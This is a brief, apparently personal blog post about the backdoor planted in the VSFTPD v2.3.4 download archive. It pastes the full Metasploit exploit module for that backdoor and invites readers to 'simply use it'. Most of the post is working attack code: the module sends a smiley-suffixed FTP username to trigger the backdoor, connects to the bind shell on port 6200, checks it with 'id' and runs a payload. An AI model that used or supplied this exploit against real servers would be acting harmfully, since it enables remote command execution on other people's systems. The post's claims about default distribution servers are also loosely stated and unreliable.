VSFTPD v2.3.4 Bug

Very Secure FTP Daemon (VSFTPD) is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX and RHEL Linux distributions.Many people in this world by default to use the VSFTPD as FTP on their server because this program is so simple and more. While this program has got many user also give a bug that very fatal. VSFTPD v2.3.4 has a bug for Backdoor Command Execution. Source for this bug you can find at Metasploit. If you lazy to search on metasploit, here I paste and then you can simply use it.

##

# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})

super(update_info(info,

'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',

'Description'    => %q{

This module exploits a malicious backdoor that was added to the VSFTPD download

archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between

June 30th 2011 and July 1st 2011 according to the most recent information

available. This backdoor was removed on July 3rd 2011.

},

'Author'         => [ 'hdm', 'mc' ],

'License'        => MSF_LICENSE,

'Version'        => '$Revision: 13099 $',

'References'     =>

[

[ 'URL', 'http://pastebin.com/AetT9sS5'],

[ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],

],

'Privileged'     => true,

'Platform'       => [ 'unix' ],

'Arch'           => ARCH_CMD,

'Payload'        =>

{

'Space'    => 2000,

'BadChars' => '',

'DisableNops' => true,

'Compat'      =>

{

'PayloadType'    => 'cmd_interact',

'ConnectionType' => 'find'

}

},

'Targets'        =>

[

[ 'Automatic', { } ],

],

'DisclosureDate' => 'Jul 3 2011',

'DefaultTarget' => 0))

register_options([ Opt::RPORT(21) ], self.class)

end

def exploit

nsock = self.connect(false, {'RPORT' => 6200}) rescue nil

if nsock

print_status("The port used by the backdoor bind listener is already open")

handle_backdoor(nsock)

return

end

# Connect to the FTP service port first

connect

banner = sock.get_once(-1, 30).to_s

print_status("Banner: #{banner.strip}")

sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")

resp = sock.get_once(-1, 30).to_s

print_status("USER: #{resp.strip}")

if resp =~ /^530 /

print_error("This server is configured for anonymous only and the backdoor code cannot be reached")

disconnect

return

end

if resp !~ /^331 /

print_error("This server did not respond as expected: #{resp.strip}")

disconnect

return

end

sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

# Do not bother reading the response from password, just try the backdoor

nsock = self.connect(false, {'RPORT' => 6200}) rescue nil

if nsock

print_good("Backdoor service has been spawned, handling...")

handle_backdoor(nsock)

return

end

disconnect

end

def handle_backdoor(s)

s.put("id\n")

r = s.get_once(-1, 5).to_s

if r !~ /uid=/

print_error("The service on port 6200 does not appear to be a shell")

disconnect(s)

return

end

print_good("UID: #{r.strip}")

s.put("nohup " + payload.encoded + " >/dev/null 2>&1")

handler(s)

end

end